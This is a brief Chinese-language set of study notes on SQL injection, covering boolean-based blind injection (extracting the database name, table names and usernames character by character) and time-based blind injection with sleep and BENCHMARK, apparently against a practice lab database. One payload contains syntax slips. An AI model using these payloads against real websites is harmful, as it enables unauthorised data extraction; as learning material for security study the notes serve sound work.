一.基于布尔的SQL注入
left(database(),1) 截取该数据库前1位。
ascii(substr((select table_name information_schema.tables where tables_schema =database()limit 0,1),1,1)) substr表示从第几位截取多少长度
ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1)) mid表示从第几位截取到第几位 ord=ascii
正则暂时不介绍。
select user() like ‘ro%’ like表示模糊匹配
基于时间的SQL盲注
If(ascii(substr(database(),1,1))>115,0,sleep(5)) 如果错误延时五秒。
BENCHMARK(100000,MD5(1))可以代替sleep(5),不过需要占用很多的cpu资源。
基于报错的SQL注入(暂时不讲)